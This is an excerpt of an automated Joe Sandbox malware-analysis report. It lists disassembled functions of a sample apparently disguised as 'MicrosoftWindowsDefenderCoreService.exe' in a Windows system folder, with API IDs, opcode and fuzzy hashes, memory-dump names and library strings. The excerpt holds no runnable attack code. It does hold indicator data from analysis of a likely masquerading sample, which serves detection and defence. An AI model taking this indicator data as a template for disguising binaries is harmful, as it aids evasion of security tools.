                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 544b57795e900993dc6ab2fe6fc2bfdc604f26172f4c8bd7ba9232aefa530dbf
                                                                                                      • Instruction ID: 495b8b2c7435117b2a3381e1366dd839a7b8f71e8e398b2637ed43e10bf82365
                                                                                                      • Opcode Fuzzy Hash: 544b57795e900993dc6ab2fe6fc2bfdc604f26172f4c8bd7ba9232aefa530dbf
                                                                                                      • Instruction Fuzzy Hash: C9113D20B09212C1FA6C772A765117EE1425F44BB0E944734E97E47ED6DE2CA481E638
                                                                                                      Function 00007FF76E1A1EC4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 78af687ee6f1c8bf6cea1a77bb6845e8d8ac8d0a943de4a8e3e7b8bb2f336905
                                                                                                      • Instruction ID: 9530509959ec0e29237eb55241ed3ca2891df44a38e27e865e0d90077e0f8216
                                                                                                      • Opcode Fuzzy Hash: 78af687ee6f1c8bf6cea1a77bb6845e8d8ac8d0a943de4a8e3e7b8bb2f336905
                                                                                                      • Instruction Fuzzy Hash: 3F112E64B08247C1F96C733A74510B9E1415F45B74ED80B34E93E4AED3DE2CB449A679
                                                                                                      Function 00007FF76E1A80D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                      • Opcode ID: d675548ff260c3428822139b252ea2b8710ba36714038c92574fd4e9350a16da
                                                                                                      • Instruction ID: 1d30a747cbac8ce7805dbdd9fed341556b02683bcc91c04cc3c67b6d08590042
                                                                                                      • Opcode Fuzzy Hash: d675548ff260c3428822139b252ea2b8710ba36714038c92574fd4e9350a16da
                                                                                                      • Instruction Fuzzy Hash: 4181C431D0C6C2CBFB6D7A2DA258239EA92AF11748FD45032C94E569D5CB2DE801F239
                                                                                                      Function 00007FF76E193F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 4e72a78afc033ce412dcfac9bfc7b6e783b7367c1d82e14657b0475efbf5066c
                                                                                                      • Instruction ID: 4a48ae7916129731563a4faeeb76adaf3059b61a995f3153fee1dd65605c43d6
                                                                                                      • Opcode Fuzzy Hash: 4e72a78afc033ce412dcfac9bfc7b6e783b7367c1d82e14657b0475efbf5066c
                                                                                                      • Instruction Fuzzy Hash: 7291F173A08781CAE714EB64F4802ADBBA1F704788F54413AEE8C17755DF38E996D724
                                                                                                      Function 00007FF76E192560 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                      • Opcode ID: 304309c19993bd8ade6526e907a9e90410f75ec28ddd64bd65e9413e692c37fe
                                                                                                      • Instruction ID: 72cc8aaae3066a26343ad90fccaf8bde5f5a9508b8c66ae687baf9faa1590706
                                                                                                      • Opcode Fuzzy Hash: 304309c19993bd8ade6526e907a9e90410f75ec28ddd64bd65e9413e692c37fe
                                                                                                      • Instruction Fuzzy Hash: 7E51AC36B1A602CAEB1CEB15F044A78A396FB54B88F918131DE5A43788DF7DEC41D724
                                                                                                      Function 00007FF76E1944A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                      • Opcode ID: 80008918aa73afb691e5de68afa07868eca546d8f81fed6c896487fa01ad9c07
                                                                                                      • Instruction ID: 9b9469db506cc016de921052db259b3ea021485da16960362ddc21bd71b407eb
                                                                                                      • Opcode Fuzzy Hash: 80008918aa73afb691e5de68afa07868eca546d8f81fed6c896487fa01ad9c07
                                                                                                      • Instruction Fuzzy Hash: 8651A7B2908341C6EB78AF11A484268B7A2FB44B84F944135DA6D47B95CF3CEC62D738
                                                                                                      Function 00007FF76E193CB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 13e6be0cdf2e1c89e698b7cb498a147cdf67c7efa57d0f18788b81dbc0e46aff
                                                                                                      • Instruction ID: 78fce177a851086e11610d6108e272c1fdc3541a1d880bcf46d8f15fc64d3613
                                                                                                      • Opcode Fuzzy Hash: 13e6be0cdf2e1c89e698b7cb498a147cdf67c7efa57d0f18788b81dbc0e46aff
                                                                                                      • Instruction Fuzzy Hash: 5961AF32908BC5C1D734AB25F4443AAB7A1FB94B88F844225EB9D03B95DF3CD591CB24
                                                                                                      Function 00007FF76E18E600 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: a236d3788c6dc273956d2bd0d737d1f2c70b8b760a15bc821f3a65a0eb825694
                                                                                                      • Instruction ID: 1744306028383a1437ce1276389a13beed6517ba2a3c3a4c678924c7bad045fc
                                                                                                      • Opcode Fuzzy Hash: a236d3788c6dc273956d2bd0d737d1f2c70b8b760a15bc821f3a65a0eb825694
                                                                                                      • Instruction Fuzzy Hash: AB416F32B0AA41C9EB18EF71E8906BD7365EF44748F880435DB4D27A99CE38D511A3B9
                                                                                                      Function 00007FF76E1AAC4C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentFreeStrings$Heap$AllocateErrorLast
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 1848424169-1631433037
                                                                                                      • Opcode ID: a35ff489d0d3ba14193343ce58dfbc904a4c6568c23973069f1c9c1939171e9d
                                                                                                      • Instruction ID: 92474ada80501f8914c7d88a0cfd1161a1a30b0ae98e113494c2fa5d5025d24c
                                                                                                      • Opcode Fuzzy Hash: a35ff489d0d3ba14193343ce58dfbc904a4c6568c23973069f1c9c1939171e9d
                                                                                                      • Instruction Fuzzy Hash: A4319731A08756C2E628BF2A744007AB694BB44BD4FC44239E99E47FD5DF3CE4419378
                                                                                                      Function 00007FF76E1A310C Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: 6bea90274e1ddf0261b549dafed0cd0423df2629b60b0ba69d4055811051c5d3
                                                                                                      • Instruction ID: 716ad81f2b817d1022386502696ea26f937c32a1d0a881d2aac7c6705671fbd7
                                                                                                      • Opcode Fuzzy Hash: 6bea90274e1ddf0261b549dafed0cd0423df2629b60b0ba69d4055811051c5d3
                                                                                                      • Instruction Fuzzy Hash: 12D1EE72B08A81C9E715DB79E4442BCB7B1FB44B98B844236CE5D97B89DE38E407D324
                                                                                                      Function 00007FF76E18D8D0 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID:
                                                                                                      • API String ID: 593203224-0
                                                                                                      • Opcode ID: e70901659d5a215cad6da5922abb1148b3ee112d15c305ba5e56ac954c0709b8
                                                                                                      • Instruction ID: 8d930a9948303d07a6c33dd4783551782edd661260b63c18412a27058b975334
                                                                                                      • Opcode Fuzzy Hash: e70901659d5a215cad6da5922abb1148b3ee112d15c305ba5e56ac954c0709b8
                                                                                                      • Instruction Fuzzy Hash: C0416022A08B45C5EA19EB16F45017AA364FB88F84F984133DE8E43765DF3CE445DB39
                                                                                                      Function 00007FF76E1911D4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 497246f021e04b2bbef846a64232120c5a6b46ee7efe2ac5d883071b72bec3f9
                                                                                                      • Instruction ID: cbffbc700ef06d4490594680fdc843d2c12e1d8e3ed099041e5169697e8859cc
                                                                                                      • Opcode Fuzzy Hash: 497246f021e04b2bbef846a64232120c5a6b46ee7efe2ac5d883071b72bec3f9
                                                                                                      • Instruction Fuzzy Hash: 78111C22B14F01C9EB00AF60E8542B873A4FB59B58F840E35DA6D867A4DF7CD1A4D364
                                                                                                      Function 00007FF76E1AA98C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CodeInfoPageValid
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 546120528-1631433037
                                                                                                      • Opcode ID: 4af0dbb684c724fe96bf341664f4c603cd190a363433aeae2eaa4d0cfb01c452
                                                                                                      • Instruction ID: 0302cd2f664b8036eeed45ec7c03b84921f698889ead991e5067d99781545401
                                                                                                      • Opcode Fuzzy Hash: 4af0dbb684c724fe96bf341664f4c603cd190a363433aeae2eaa4d0cfb01c452
                                                                                                      • Instruction Fuzzy Hash: 58818F62A08682D6F76DAF29F050179F7A2FB44780FC84036C68E47A90DE3DE545E338
                                                                                                      Function 00007FF76E1946D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                      • Opcode ID: 1f6efa882bf4f4cf33d0bfbb7f6dec5b5492705073dcf45ce2cc2171be57f55a
                                                                                                      • Instruction ID: 4b9fac85accd45bf298d090c4bb4895758bdf2a6cf5d7fdd90d2f5682bd61156
                                                                                                      • Opcode Fuzzy Hash: 1f6efa882bf4f4cf33d0bfbb7f6dec5b5492705073dcf45ce2cc2171be57f55a
                                                                                                      • Instruction Fuzzy Hash: 0071C232908691C6D778AF25E080779BBA2FB44F84F448131DA9D47685CF3CD852D764
                                                                                                      Function 00007FF76E194D80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                      • Opcode ID: f9b199feffe51fe14d700ed6b556c1e2233788361c1b5b39dfb5c3d1f05c27eb
                                                                                                      • Instruction ID: f9e4df2143d827b2a670a59dcb276ad49fe55e5e78b4416058cbb70e205e464f
                                                                                                      • Opcode Fuzzy Hash: f9b199feffe51fe14d700ed6b556c1e2233788361c1b5b39dfb5c3d1f05c27eb
                                                                                                      • Instruction Fuzzy Hash: 20516D32A19741C6E628AB15F48026EB7A5FB88B91F540534EF8D07B56CF3CE891DB24
                                                                                                      Function 00007FF76E19E2A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe, xrefs: 00007FF76E19E2E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                      • String ID: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                      • API String ID: 3580290477-1991816072
                                                                                                      • Opcode ID: c7ce43bd8065d113563e93934c7efb2166c296d5945c70c02e0617e6608e1cbd
                                                                                                      • Instruction ID: 8f28251947a1f75bc3877b9bf567ee38ec08ece0f5a720f728059cef83be5a09
                                                                                                      • Opcode Fuzzy Hash: c7ce43bd8065d113563e93934c7efb2166c296d5945c70c02e0617e6608e1cbd
                                                                                                      • Instruction Fuzzy Hash: 4B417132A08616C6EB1DEF25F4401BCA795FB44B84B844035E94E87B95DF3CEA819738
                                                                                                      Function 00007FF76E1A37A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 661a253012c350d1591fa1e673cc383de945a6ecb0d554cda199366c01c008e0
                                                                                                      • Instruction ID: 08285e0f34adff1b9885e52338761e48ad4e97754d745154a4e4d7c4fc843c5f
                                                                                                      • Opcode Fuzzy Hash: 661a253012c350d1591fa1e673cc383de945a6ecb0d554cda199366c01c008e0
